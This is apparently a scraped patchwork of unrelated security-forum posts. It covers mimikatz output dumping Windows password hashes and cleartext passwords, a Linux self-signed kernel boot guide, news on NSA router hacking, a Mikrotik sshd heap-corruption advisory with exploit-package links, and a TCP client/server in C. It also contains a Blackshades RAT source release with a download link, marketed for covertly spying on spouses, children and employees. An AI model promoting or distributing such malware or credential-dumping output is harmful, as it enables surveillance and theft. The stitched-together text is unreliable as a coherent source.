    Utilisateur principal      : Gentil User
    Domaine d'authentification : vm-w7-ult
        msv1_0 :  lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
        wdigest : password
        tspkg :   password

    Authentification Id        : 0;269806
    Package d'authentification : NTLM
    Utilisateur principal      : Gentil Kiwi
    Domaine d'authentification : vm-w7-ult
        msv1_0 :  lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest : waza1234/
        tspkg :   waza1234/

I wondered why the cleartext password would need to be stored in LSASS – after all, every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash.

Tool: mimikatz | Blog de Gentil Kiwi

Source: mimikatz: Tool To Recover Cleartext Passwords From Lsass | pentestmonkey
-
I don’t understand your opinion. You’re not stealing from the system, you’re stealing from people. Imagine (just as an idea) that a gypsy steals your wife’s wallet on the street. What do you do? Do you go to him and congratulate him for being against the system, for not respecting the laws? If you worked on a project, made 300 dollars on it, have them on PayPal and someone steals them, do you send him another 20 dollars so he can buy himself a bottle of whiskey, because he’s against the system? It’s the same here: you’re not stealing from any system, you’re stealing from other people, people who are not like you, but people who worked for that money. Since you lived with mom and dad until you were 30 and ate sunflower seeds in front of the apartment block, so you have no idea how money is made, naturally you don’t know what it means to work. I’m not referring to you; I used the second person in a general sense. But I have a few questions: how old are you? How many years have you worked?

I agree with certain things, in plain terms:
1. breaking into websites - Club Show Off
2. the exchange of "goods and services" - RST Market
3. creating malware - Analiza malware

These things aren’t legal either, but:
1. this is the best way to learn web security
2. you get money for which, practically, you haven’t stolen from anyone
3. just like the first point, if you want to be a good malware researcher, you need to know how to write a few lines of code

In all these cases, you DON’T STEAL from anyone. Sure, the things above are not legal and you answer for your actions, but they are not as serious as stealing the money of people who go to Subway. I go to Subway too; how would it be if I found myself with no money on my card after buying a sandwich? Well, if I catch that guy I’ll stomp on his head.
-
Booting a Self-signed Linux Kernel

Now that The Linux Foundation is a member of the UEFI.org group, I’ve been working on the procedures for how to boot a self-signed Linux kernel on a platform so that you do not have to rely on any external signing authority. After digging through the documentation out there, it turns out to be relatively simple in the end, so here’s a recipe for how I did this, and how you can duplicate it yourself on your own machine.

[h=3]We don’t need no stinkin bootloaders![/h]

When building your kernel image, make sure the following options are set:

    CONFIG_EFI=y
    CONFIG_EFI_STUB=y
    ...
    CONFIG_FB_EFI=y
    ...
    CONFIG_CMDLINE_BOOL=y
    CONFIG_CMDLINE="root=..."
    ...
    CONFIG_BLK_DEV_INITRD=y
    CONFIG_INITRAMFS_SOURCE="my_initrd.cpio"

The first two options here enable EFI mode, and tell the kernel to build itself as an EFI binary that can be run directly from the UEFI bios. This means that no bootloader is involved at all in the system; the UEFI bios just boots the kernel, no “intermediate” step needed at all. As much as I love gummiboot, if you trust the kernel image you are running is “correct”, this is the simplest way to boot a signed kernel.

As no bootloader is going to be involved in the boot process, you need to ensure that the kernel knows where the root partition is, what init is going to be run, and anything else that the bootloader normally passes to the kernel image. The option listed above, CONFIG_CMDLINE, should be set to whatever you want the kernel to use as the command line.

Also, as we don’t have an initrd passed by the bootloader to the kernel, if you want to use one, you need to build it into the kernel itself. The option CONFIG_INITRAMFS_SOURCE should be set to your pre-built cpio initramfs image you wish to use. Note, if you don’t want to use an initrd/initramfs, don’t set this last option.

Also, currently it’s a bit of a pain to build the kernel, build the initrd using dracut with the needed dracut modules and kernel modules, and then rebuild the kernel adding the cpio image to the kernel image. I’ll be working next on taking a pre-built kernel image, tearing it apart and adding a cpio image directly to it, no need to rebuild the kernel. Hopefully that can be done with only a minimal use of libbfd.

After setting these options, build the kernel and install it on your boot partition (it is in FAT mode, so that UEFI can find it, right?) To have UEFI boot it directly, you can place it in /boot/EFI/boot/bootx64.efi, so that UEFI will treat it as the “default” bootloader for the machine.

[h=3]Lather, rinse, repeat[/h]

After you have a kernel image installed on your boot partition, it’s time to test it. Reboot the machine, and go into the BIOS. Usually this means pounding on the F2 key as the boot starts up, but all machines are different, so it might take some experimentation to determine which key your BIOS needs. See this post from Matthew Garrett for the problems you might run into trying to get into BIOS mode on UEFI-based laptops.

Traverse the BIOS settings and find the place where UEFI boot mode is specified, and turn the “Secure Boot” option OFF. Save the option and reboot; the BIOS should find the kernel located at /boot/EFI/boot/bootx64.efi and boot it directly. If your kernel command line and initramfs (if you used one) are set up properly, you should now be up and running and able to use your machine as normal.

If you can’t boot properly, ensure that your kernel command line was set correctly, or that your initramfs has the needed kernel modules in it. This usually takes a few times back and forth to get all of the correct settings properly configured. Only after you can successfully boot the kernel directly from the BIOS, in “insecure” mode, should you move to the next step.

[h=3]Keys to the system[/h]

Now that you have a working kernel image and system, it is time to start messing with keys. There are three different types of UEFI keys that you need to learn about, the “Platform Key” (known as a “PK”), the “Key-Exchange Keys” (known as a “KEK”), and the “Signature Database Key” (known as a “db”). For a simple description of what these keys mean, see the Linux Foundation Whitepaper about UEFI Secure boot, published back in 2011. For a more detailed description of the keys, see the UEFI Specification directly.

For a very simple description, the “Platform Key” shows who “owns and controls” the hardware platform. The “Key-Exchange keys” shows who is allowed to update the hardware platform, and the “Signature Database keys” show who is allowed to boot the platform in secure mode.

If you are interested in how to manipulate these keys, replace them, and do neat things with them, see James Bottomley’s blog for descriptions of the tools you can use and much more detail than I provide here.

To manipulate the keys on the system, you need the UEFI keytool USB image from James’s website called sb-usb.img (md5sum 7971231d133e41dd667a184c255b599f). dd the image to a USB drive, and boot the machine into the image. Depending on the mode of the system (insecure or secure), you will be dropped to the UEFI console, or be presented with a menu. If a command line, type KeyTool to run the keytool binary. If a menu, select the option to run KeyTool directly.

[h=3]Save the keys[/h]

First thing to do, you should save the keys that are currently on the system, in case something “bad” ever happens and you really want to be able to boot another operating system in secure mode on the hardware. Go through the menu options in the KeyTool program and save off the PK, KEK, and db keys to the USB drive, or to the hard drive, or another USB drive you plug into the system. Take those keys and store them somewhere “safe”.

[h=3]Clear the machine[/h]

Next you should remove all keys from the system. You can do this from the KeyTool program directly, or just reboot into the BIOS and select an option to “remove all keys”, if your BIOS provides this (some do, and some don’t.)

[h=3]Create and install your own keys[/h]

Now that you have an “empty” machine, with the previous keys saved off somewhere else, you should download the sbsigntool and efitools packages and install them on your development system. James has built all of the latest versions of these packages in the openSUSE build system for all RPM and DEB-based Linux distros. If you have a Gentoo-based system, I have checked the needed versions into portage, so just grab them directly from there. If you want to build these from source, the sbsigntool git tree can be found here, and the efitools git tree is here.

The efitools README is a great summary of how to create new keys, and here are the commands it says to follow in order to create your own set of keys:

    # create a PK key
    openssl req -new -x509 -newkey rsa:2048 -subj "/CN=my PK name/" -keyout PK.key -out PK.crt -days 3650 -nodes -sha256
    # create a KEK key
    openssl req -new -x509 -newkey rsa:2048 -subj "/CN=my KEK name/" -keyout KK.key -out KK.crt -days 3650 -nodes -sha256
    # create a db key
    openssl req -new -x509 -newkey rsa:2048 -subj "/CN=my db name/" -keyout db.key -out db.crt -days 3650 -nodes -sha256

The option -subj can contain a string with whatever name you wish to have for your key, be it your company name, or the like. Other fields can be specified as well to make the key more “descriptive”.

Then, take the PK key you have created, turn it into an EFI Signature List file, and add a GUID to the key:

    cert-to-efi-sig-list -g <my random guid> PK.crt PK.esl

Where my random guid is any valid guid you wish to use (I’ve seen some companies use all ‘5’ as their guid, so I’d recommend picking something else a bit more “random” to make it look like you know what you are doing with your key…).

Now take the EFI Signature List file and create a signed update file:

    sign-efi-sig-list -k PK.key -c PK.crt PK PK.esl PK.auth

For more details about the key creation (and to see where I copied these command lines from), see James’s post about owning your own Windows 8 platform.

Take these files you have created, put them on a USB disk, run the KeyTool program and use it to add the db, KEK, and PK keys into the BIOS. Note, apply the PK key last, as once it is installed, the platform will be “locked” and you should not be able to add any other keys to the system.

[h=3]Fail to boot[/h]

Now that your own set of keys is installed in the system, flip the BIOS back into “Secure boot” mode, and try to boot your previously successful Linux image again. Hopefully it should fail with some type of warning; the laptop I did this testing on provides this “informative” graphic:

[Figure: the laptop’s secure boot violation warning screen]

[h=3]Sign your kernel[/h]

Now that your kernel can’t boot, you need to sign it with the db key you placed in your bios:

    sbsign --key db.key --cert db.crt --output bzImage bzImage.signed

Take the bzImage.signed file and put it back in the boot partition, copying over the unsigned /boot/EFI/boot/bootx64.efi file.

[h=3]Profit![/h]

Now, rebooting the machine should cause the UEFI bios to check the signatures of the signed kernel image, and boot it properly.

[h=3]Demo[/h]

I’ve recorded a video of a Gateway laptop booting a signed kernel, with my own key, here. The demo tries to boot an unsigned kernel image that is on the hard disk, but it fails. I plug in a signed kernel that is on the USB disk, and it properly boots. I did the test with a CoreOS image as it provides a very small self-contained Linux system that allows for easy testing/building from a development machine.

[h=3]Future plans[/h]

Now that you have full control over your system, running only a Linux kernel image that you sign yourself, a whole raft of possibilities open up. Here are a few that I can think of off the top of my head:

Linux signed system self-contained in the kernel image (with initramfs) booting into ram, nothing on the disk other than the original kernel image.
Signed kernel image initramfs validates the other partitions with a public key to ensure they aren’t tampered before mounting and using them (ChromeOS does this exact thing quite well). This passes the “chain of trust” on to the filesystem image, giving you assurances that you are running code you trust, on a platform you trust.
Combine signed kernel images with TPM key storage to unlock encrypted partitions.

If you are interested in these types of things, I’ll be at the Linux Plumbers Conference in a few weeks, where a bunch of people will be discussing secure boot issues with Linux. I’ll also be at LinuxCon North America, Europe, and Korea if you want to talk about UEFI and Linux issues there.

Posted by Greg Kroah-Hartman

Source: booting a self-signed Linux kernel - Linux Kernel Monkey Log
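The PK.esl that cert-to-efi-sig-list writes in the recipe above is an EFI_SIGNATURE_LIST structure, and enrolling the wrong one as PK locks the platform. The following is an added example, not code from the original post or from efitools: it builds and parses that structure in Python, and sanity-checks a candidate PK list (one X.509 entry, owned by the GUID you chose) before you hand it to KeyTool. The owner GUID and the certificate body are constructed placeholders.

```python
"""Build, parse and sanity-check UEFI EFI_SIGNATURE_LIST (.esl) blobs.

Layout (UEFI spec, signature database section):
  EFI_SIGNATURE_LIST: SignatureType GUID(16) | SignatureListSize u32 |
                      SignatureHeaderSize u32 | SignatureSize u32 |
                      SignatureHeader[SignatureHeaderSize] |
                      N x EFI_SIGNATURE_DATA (SignatureOwner GUID(16) | data)
All GUIDs are stored in mixed-endian ("bytes_le") form.
"""
import struct
import uuid

# Signature type GUID for X.509 certificates, fixed by the UEFI specification.
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
_LIST_HDR = struct.Struct("<16sIII")  # SignatureType, ListSize, HeaderSize, SignatureSize
_OWNER_LEN = 16


def build_esl(owner_guid, certs_der, sig_type=EFI_CERT_X509_GUID):
    """Return one EFI_SIGNATURE_LIST holding the given DER certificates.

    Every entry in one list shares a single SignatureSize, so certificates of
    different lengths must go into separate lists concatenated back to back.
    """
    owner_guid = uuid.UUID(str(owner_guid))
    if not certs_der:
        raise ValueError("at least one certificate is required")
    sizes = {len(c) for c in certs_der}
    if len(sizes) != 1:
        raise ValueError("all entries in one list must be the same size")
    sig_size = _OWNER_LEN + sizes.pop()
    list_size = _LIST_HDR.size + len(certs_der) * sig_size
    out = _LIST_HDR.pack(sig_type.bytes_le, list_size, 0, sig_size)
    for der in certs_der:
        out += owner_guid.bytes_le + der
    return out


def parse_esl(blob):
    """Return [(signature_type, owner_guid, data), ...] for every entry.

    Truncated or inconsistent structures raise ValueError instead of being
    silently accepted, which is the point of checking before enrolment.
    """
    entries = []
    off = 0
    while off < len(blob):
        if len(blob) - off < _LIST_HDR.size:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        raw_type, list_size, hdr_size, sig_size = _LIST_HDR.unpack_from(blob, off)
        if list_size < _LIST_HDR.size + hdr_size or off + list_size > len(blob):
            raise ValueError("list size exceeds blob")
        if sig_size <= _OWNER_LEN:
            raise ValueError("signature size leaves no room for data")
        body = list_size - _LIST_HDR.size - hdr_size
        if body % sig_size:
            raise ValueError("list body is not a whole number of signatures")
        sig_type = uuid.UUID(bytes_le=raw_type)
        pos = off + _LIST_HDR.size + hdr_size
        for _ in range(body // sig_size):
            owner = uuid.UUID(bytes_le=blob[pos:pos + _OWNER_LEN])
            entries.append((sig_type, owner, blob[pos + _OWNER_LEN:pos + sig_size]))
            pos += sig_size
        off += list_size
    return entries


def check_pk_esl(blob, expected_owner):
    """Pre-enrolment check: exactly one X.509 entry, owned by expected_owner."""
    expected_owner = uuid.UUID(str(expected_owner))
    entries = parse_esl(blob)
    if len(entries) != 1:
        return False, "PK must hold exactly one certificate, found %d" % len(entries)
    sig_type, owner, data = entries[0]
    if sig_type != EFI_CERT_X509_GUID:
        return False, "unexpected signature type %s" % sig_type
    if owner != expected_owner:
        return False, "owner GUID %s does not match %s" % (owner, expected_owner)
    if not data.startswith(b"\x30\x82"):  # DER SEQUENCE with a 2-byte length
        return False, "payload does not look like a DER certificate"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: hypothetical owner GUID and a placeholder DER body,
    # not a real certificate.
    my_guid = "11111111-2222-3333-4444-555555555555"
    fake_cert = b"\x30\x82\x01\x00" + b"\xAA" * 256
    esl = build_esl(my_guid, [fake_cert])
    print(check_pk_esl(esl, my_guid))
```

On a real PK.esl, feed the file bytes to check_pk_esl with the GUID you passed to cert-to-efi-sig-list -g.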
-
Blackshades 2.6.3 Source

Posted by: FastFlux September 2, 2013

Blackshades full source, coded in Visual Basic 6.

Blackshades Remote Controller is a RAT (Remote Administration Application) which allows a user to control several clients from around the world. Long recognized as the king/master of all RATs, Blackshades NET has been through many iterations through the years. A comprehensive software! Wise enough to teach an absolute beginner and powerful enough to manage and master any computer at distance. The Blackshades Team has long been known as “brains behind the best-selling brand in the remote tech section”.

Need to help out a customer who is having trouble setting up a piece of software? Have you ever questioned what your spouse, kids or employees have been doing on the computer? Is your child misusing the Internet facility and taking secret chat with the stranger? Are your employees mailing your business data to your competitors? Blackshades Remote Controller will enable you to control the client’s PC as if you were sitting right in front of it, with support for mouse and keyboard input! You can also chat with the client while you do so.

Got a Network to manage? With Blackshades Remote Controller you can connect to unlimited systems, and administer them collectively or individually. You can transfer files and folders between systems, view all the screens of the systems simultaneously and perform maintenance actions. Send a message to all of them with one click, chat with the systems, run commands via the remote command prompt…there’s a huge range of functions suited for network management.

Blackshades Remote Controller also provides an efficient way of turning your machine into a surveillance/spy-device or to spy on a specific system. If you want to monitor all keystrokes on your computer while you are away, or want to make sure your child is being safe while using the computer, the built in tools such as the keystroke capturer, screen viewer and process manager will aid you to do so.

This tool has no dependencies (.NET Framework, java, etc) and works extremely well and is stable. Blackshades Remote Controller will let you remotely control your machines, while giving you complete peace of mind. Using this tool will allow you to do anything between controlling software and hardware. Customers also get free support, and the ability to instantly communicate with other members.

Download: https://app.box.com/s/a9xcr3izpu632v4az98s

Source: Blackshades 2.6.3 Source
-
NSA Laughs at PCs, Prefers Hacking Routers and Switches By Kim Zetter 09.04.13 6:30 AM The NSA runs a massive, full-time hacking operation targeting foreign systems, the latest leaks from Edward Snowden show. But unlike conventional cybercriminals, the agency is less interested in hacking PCs and Macs. Instead, America’s spooks have their eyes on the internet routers and switches that form the basic infrastructure of the net, and are largely overlooked as security vulnerabilities. Under a $652-million program codenamed “Genie,” U.S. intel agencies have hacked into foreign computers and networks to monitor communications crossing them and to establish control over them, according to a secret black budget document leaked to the Washington Post. U.S. intelligence agencies conducted 231 offensive cyber operations in 2011 to penetrate the computer networks of targets abroad. This included not only installing covert “implants” in foreign desktop computers but also on routers and firewalls — tens of thousands of machines every year in all. According to the Post, the government planned to expand the program to cover millions of additional foreign machines in the future and preferred hacking routers to individual PCs because it gave agencies access to data from entire networks of computers instead of just individual machines. Most of the hacks targeted the systems and communications of top adversaries like China, Russia, Iran and North Korea and included activities around nuclear proliferation. The NSA’s focus on routers highlights an often-overlooked attack vector with huge advantages for the intruder, says Marc Maiffret, chief technology officer at security firm Beyond Trust. Hacking routers is an ideal way for an intelligence or military agency to maintain a persistent hold on network traffic because the systems aren’t updated with new software very often or patched in the way that Windows and Linux systems are. “No one updates their routers,” he says. 
“If you think people are bad about patching Windows and Linux (which they are) then they are … horrible about updating their networking gear because it is too critical, and usually they don’t have redundancy to be able to do it properly.” He also notes that routers don’t have security software that can help detect a breach. “The challenge [with desktop systems] is that while antivirus don’t work well on your desktop, they at least do something [to detect attacks],” he says. “But you don’t even have an integrity check for the most part on routers and other such devices like IP cameras.” Hijacking routers and switches could allow the NSA to do more than just eavesdrop on all the communications crossing that equipment. It would also let them bring down networks or prevent certain communication, such as military orders, from getting through, though the Post story doesn’t report any such activities. With control of routers, the NSA could re-route traffic to a different location, or intelligence agencies could alter it for disinformation campaigns, such as planting information that would have a detrimental political effect or altering orders to re-route troops or supplies in a military operation. According to the budget document, the CIA’s Tailored Access Programs and NSA’s software engineers possess “templates” for breaking into common brands and models of routers, switches and firewalls. The article doesn’t say it, but this would likely involve pre-written scripts or backdoor tools and root kits for attacking known but unpatched vulnerabilities in these systems, as well as for attacking zero-day vulnerabilities that are yet unknown to the vendor and customers. “[Router software is] just an operating system and can be hacked just as Windows or Linux would be hacked,” Maiffret says. 
“They’ve tried to harden them a little bit more [than these other systems], but for folks at a place like the NSA or any other major government intelligence agency, it’s pretty standard fare of having a ready-to-go backdoor for your [off-the-shelf] Cisco or Juniper models.”

Not all of the activity mentioned in the budget document involved remote hacking. In some cases, according to the document, the operations involved clandestine activity by the CIA or military intelligence units to “physically place hardware implants or software modifications” to aid the spying.

“Much more often, an implant is coded entirely in software by an NSA group called Tailored Access Operations (TAO),” the Post writes in its story about the document. “As its name suggests, TAO builds attack tools that are custom-fitted to their targets.”

A handful of security researchers have uncovered vulnerabilities in routers in recent years that could be used to do the kind of hacking described in the budget document. In 2005, security researcher Mike Lynn found a serious vulnerability in Cisco IOS, the operating system running on millions of Cisco routers around the world. Lynn discovered the vulnerability after his employer, Internet Security Systems, asked him to reverse-engineer the Cisco operating system to see if he could find security problems with it.

Cisco makes the majority of the routers that operate the backbone of the internet as well as many company networks and critical infrastructure systems. The Cisco IOS is as ubiquitous in the backbone as the Windows operating system is on desktops. The vulnerability Lynn found, in a new version of the operating system that Cisco planned to release at the time, would have allowed someone to create a router worm that would shut down every Cisco router through which it passed, bringing down a nation’s critical infrastructure.
It also would have allowed an attacker to gain complete control of the router to sniff all traffic passing through a network in order to read, record or alter it, or simply prevent traffic from reaching its recipient. Once Lynn found the vulnerability, it took him six months to develop a working exploit to attack it. Lynn had planned to discuss the vulnerability at the Black Hat security conference in Las Vegas, until Cisco intervened and forced him to pull the talk under threat of a lawsuit. But if Lynn knew about the vulnerability, there were likely others who did as well — including intelligence agencies and criminal hackers. Source code for Cisco’s IOS has been stolen at least twice, either by entities who were interested in studying the software to gain a competitive advantage or to uncover vulnerabilities that would allow someone to hack or control them. Other researchers have uncovered different vulnerabilities in other Cisco routers that are commonly used in small businesses and home offices. Every year at computer security conferences — including the Black Hat conference where NSA Director Keith Alexander presented a keynote this year — U.S. intelligence agencies and contractors from around the world attend to discover information about new vulnerabilities that might be exploited and to hire talented researchers and hackers capable of finding more vulnerabilities in systems. In 2008, a researcher at Core Security Technologies developed a root kit for the Cisco IOS that was designed to give an attacker a persistent foothold on a Cisco router while remaining undetected. 
According to the Post story, the NSA designs most of the offensive tools it uses in its Genie operation, but it spent $25.1 million in one year for “additional covert purchases of software vulnerabilities” from private malware vendors who operate on the grey market — closed markets that peddle vulnerabilities and exploits to law enforcement and intelligence agencies, as opposed to the black market that sells them to cyber criminals. The price of vulnerabilities and exploits varies, depending on a number of factors. Vulnerabilities and exploits can sell for anywhere from $50,000 to more than a million, depending on the exclusivity of the purchase — some vulnerabilities are sold to multiple parties with the understanding that others are using it as well — and their ubiquity. A vulnerability that exists in multiple versions of an operating system is more valuable than a vulnerability that exists in just one version. A class of vulnerability that crosses multiple browser brands is also more valuable than a single vulnerability that just affects the Safari browser or Chrome. The Stuxnet cyber weapon that was reportedly created by the U.S. and Israel to sabotage centrifuges used in Iran’s uranium enrichment program, used five zero-day exploits to spread itself among systems in Iran, including a rare exploit that attacked the .LNK function in multiple versions of the Windows operating system in order to spread the worm silently via infected USB sticks. Ubiquitous router vulnerabilities are difficult to find since there are so many different configurations for routers, and an attack that works against one router configuration might not work for another. But a vulnerability that affects the core operating system is much more valuable since it is less likely to be dependent on the configuration. Maiffret says there hasn’t been a lot of public research on router vulnerabilities, but whenever someone has taken a look at them, they have found security holes in them. 
“They’re always successful in finding something,” he says.

Once a vulnerability becomes known to the software maker and is patched, it loses a lot of its value. But because many users and administrators do not patch their systems, some vulnerabilities can be used effectively for years, even after a patch is available. The Conficker worm, for example, continued to infect millions of computers long after Microsoft released a patch that should have stopped the worm from spreading.

Routers in particular often remain unpatched because system administrators don’t think they will be targeted and because administrators are concerned about network outages that could occur while the patch is applied or if the patch is faulty.

Source: NSA Laughs at PCs, Prefers Hacking Routers and Switches | Threat Level | Wired.com
-
Keccak and the SHA-3 Standardization

Guido Bertoni (STMicroelectronics), Joan Daemen (STMicroelectronics), Michaël Peeters (NXP Semiconductors), Gilles Van Assche (STMicroelectronics)

NIST, Gaithersburg, MD, February 6, 2013

Outline:
The beginning
The sponge construction
Inside Keccak
Analysis underlying Keccak
Applications of Keccak, or sponge
Some ideas for the SHA-3 standard

Slides: http://csrc.nist.gov/groups/ST/hash/sha-3/documents/Keccak-slides-at-NIST.pdf
-
[h=1]A New Focus on Security in the Web Console[/h]

Garrett Robinson

Web developers need better tools to help them debug security issues. The Web Console, part of the Firefox Developer Tools, shows errors and warnings filtered into different categories. Firefox 23 adds a new category of messages to the Web Console: Security messages.

[Figure: Toggle buttons for categories of messages in the Web Console]

The Security toggle button and messages are red to warn developers, since some of these messages indicate that your site has a security vulnerability.

Once we had a dedicated place for security messages, we had to decide what kinds of issues should be reported to developers. Ivan Alagenchev, a security engineering intern, spent the summer improving security reporting to fulfill the following goals:

Warn developers about altered site behavior that is due to a security feature (for example, resource loads blocked by the Mixed Content Blocker or the Same Origin Policy).
Warn developers about mistakes made in implementing security features (for example, using deprecated CSP headers, or mistyping an HSTS header).
Warn developers about common security risks (for example, putting password fields on insecure pages).

Here are example screenshots of some of the new Security messages:

[Figure: Warnings for loading mixed content]
[Figure: Warning for detected password field on an insecure page.]

These specific messages are available to current Nightly users and will be part of upcoming stable releases.

While security should be of paramount importance to any developer, it is a complex subject that is not always part of a web developer’s education and often appears at inconvenient times. This new messaging helps developers find security-related problems early on in the development life cycle so they can be resolved quickly and effectively. Additionally, these messages help educate developers about common issues in web security. Many of the new messages end with a “Learn More” link that takes you to a wiki with background information and advice for mitigating the security issue.

Bug 863874 is the meta-bug for logging relevant security messages to the Web Console. If you have more ideas for useful features like the ones discussed here, or are interested in contributing, check out the metabug and its dependencies!

Source: https://blog.mozilla.org/security/2013/09/04/a-new-focus-on-security-in-the-web-console/
-
[h=1]Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption[/h]

During an audit the Mikrotik RouterOS sshd (ROSSSH) has been identified to have a remote pre-authentication heap corruption in its sshd component. Exploitation of this vulnerability will allow full access to the router device.

This analysis describes the bug and includes a way to get developer access to recent versions of Mikrotik RouterOS using the /etc/devel-login file. This is done by forging a modified NPK file using a correct signature and logging into the device with username ‘devel’ and the password of the administrator. This will drop into a busybox shell for further researching the sshd vulnerability using gdb and strace tools that have been compiled for the Mikrotik busybox platform.

Shodanhq.com shows >290.000 entries for the ROSSSH search term.

The 50 megs Mikrotik package including all the research items can be downloaded here:
http://www.farlight.org/mikropackage.zip
http://www.exploit-db.com/sploits/28056.zip

Source: Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption

Ok, now I understand. A few days ago I received a DDoS (allegedly) from 550+ IPs. ( Info ) As Shocker suggested, those IPs were Mikrotik routers. I have a vague impression that this is the method by which whoever doesn’t like us obtained access to those routers.
-
Ooh, these guys pay well, don’t they?
-
[h=1]TCPUDP in C[/h]

```c
/*
 ============================================================================
 Name        : TCPServer.c
 Author      : www.facebook.com/unix4u
 Version     :
 Copyright   : LGPL
 Description : TCP-SERVER IN C, Ansi-style
 ============================================================================
 */
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>

void signalhandler(int signum)
{
    if (SIGTERM == signum) {
        printf("See you later bye\n");
        exit(SIGTERM);
    }
}

int main(int argc, char *argv[])
{
    int server_sock_fd, client_sock_fd;
    struct sockaddr_in server_addr;
    char readbuffer[256] = "", writebuffer[256] = "";

    signal(SIGTERM, signalhandler);

    if (argc < 2) {
        printf("please run as ./TCPServer <port-no> \n");
        exit(1);
    }

    /* check return values: errno is not reset on success, so testing it
       after every call (as the original did) reports stale errors */
    server_sock_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_sock_fd < 0) {
        perror("Create socket");
        exit(errno);
    }

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    server_addr.sin_port = htons(atoi(argv[1]));

    if (bind(server_sock_fd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Bind");
        exit(errno);
    }
    if (listen(server_sock_fd, 1) < 0) {
        perror("Listen");
        exit(errno);
    }

    while (1) {
        int i, j, k, ntemp, array[20];
        char temp[256];
        ssize_t n;

        client_sock_fd = accept(server_sock_fd, NULL, NULL);
        if (client_sock_fd < 0) {
            perror("Accept");
            continue;
        }

        /* one request per connection: "n1:n2:...:nk" or "stop" */
        n = read(client_sock_fd, readbuffer, sizeof(readbuffer) - 1);
        if (n < 0) {
            perror("Get Data");
            close(client_sock_fd);
            continue;
        }
        readbuffer[n] = '\0';   /* NUL-terminate whatever length arrived */

        /* strcmp() returns 0 on a match; the original broke out of the loop
           on every request that was NOT " stop" */
        if (strcmp(readbuffer, "stop") == 0) {
            close(client_sock_fd);
            break;
        }

        /* split on ':'; keep digits only, at most 9 per number (fits an int)
           and at most 20 numbers (array has 20 slots) */
        j = 0;
        k = 0;
        for (i = 0; i <= (int)strlen(readbuffer); i++) {
            if (readbuffer[i] != ':' && readbuffer[i] != '\0') {
                if (isdigit((unsigned char)readbuffer[i]) && j < 9)
                    temp[j++] = readbuffer[i];
            } else {
                temp[j] = '\0';            /* terminate before atoi() */
                if (j > 0 && k < 20)
                    array[k++] = atoi(temp);
                j = 0;
            }
        }

        /* bubble sort, ascending */
        for (i = 0; i < k; i++) {
            for (j = 0; j < k - i - 1; j++) {
                if (array[j] > array[j + 1]) {
                    ntemp = array[j];
                    array[j] = array[j + 1];
                    array[j + 1] = ntemp;
                }
            }
        }

        /* reply " a b c " (20 numbers of 9 digits fit easily in 256 bytes) */
        strcpy(writebuffer, " ");
        for (i = 0; i < k; i++) {
            sprintf(temp, "%d ", array[i]);
            strcat(writebuffer, temp);
        }

        if (write(client_sock_fd, writebuffer, strlen(writebuffer) + 1) < 0)
            perror("Send Data");
        if (close(client_sock_fd) < 0)
            perror("Close connection");
    }

    if (close(server_sock_fd) < 0)
        perror("Server Termination");
    return 0;
}
```

```c
/*
 ============================================================================
 Name        : TCPClient.c
 Author      : www.facebook.com/unix4u
 Version     :
 Copyright   : LGPL
 Description : TCP CLIENT in C, Ansi-style
 ============================================================================
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <string.h>
#include <signal.h>

void signalhandler(int signum)
{
    if (SIGALRM == signum) {
        printf("Host timed Out\n");
        exit(ETIMEDOUT);
    }
    if (SIGTERM == signum) {
        printf("See you later bye\n");
        exit(SIGTERM);
    }
}

int main(int argc, char *argv[])
{
    int socket_fd, i;
    char writebuffer[256] = "", readbuffer[256] = "";
    struct sockaddr_in server_addr;
    size_t used = 0;
    ssize_t n;

    signal(SIGALRM, signalhandler);
    signal(SIGTERM, signalhandler);

    if (argc < 4) {
        printf("please run as ./TCPClient <ip-address> <port-no> <numbers>/stop \n");
        exit(1);
    }

    /* join argv[3..] as "n1:n2:...:nk" (or just "stop"), refusing to
       overflow the 256-byte request buffer */
    for (i = 3; i < argc; i++) {
        size_t need = strlen(argv[i]) + (i > 3 ? 1 : 0);
        if (used + need >= sizeof(writebuffer)) {
            fprintf(stderr, "too many numbers for the 256-byte request buffer\n");
            exit(1);
        }
        if (i > 3)
            strcat(writebuffer, ":");
        strcat(writebuffer, argv[i]);
        used += need;
    }

    socket_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (socket_fd < 0) {
        perror("Create socket");
        exit(errno);
    }

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(atoi(argv[2]));
    /* inet_pton() returns 1 on success and 0 for a malformed address
       without touching errno, so it cannot be checked through perror() */
    if (inet_pton(AF_INET, argv[1], &server_addr.sin_addr) != 1) {
        fprintf(stderr, "Ip address conversion: invalid IPv4 address '%s'\n", argv[1]);
        exit(1);
    }

    alarm(5);   /* SIGALRM handler aborts if the server does not answer in 5 s */
    if (connect(socket_fd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Connection");
        exit(errno);
    }
    if (write(socket_fd, writebuffer, strlen(writebuffer) + 1) < 0) {
        perror("Send Data");
        exit(errno);
    }
    n = read(socket_fd, readbuffer, sizeof(readbuffer) - 1);
    if (n < 0) {
        perror("Get Data");
        exit(errno);
    }
    readbuffer[n] = '\0';
    puts(readbuffer);

    if (close(socket_fd) < 0)
        perror("Connection close");
    return 0;
}
```

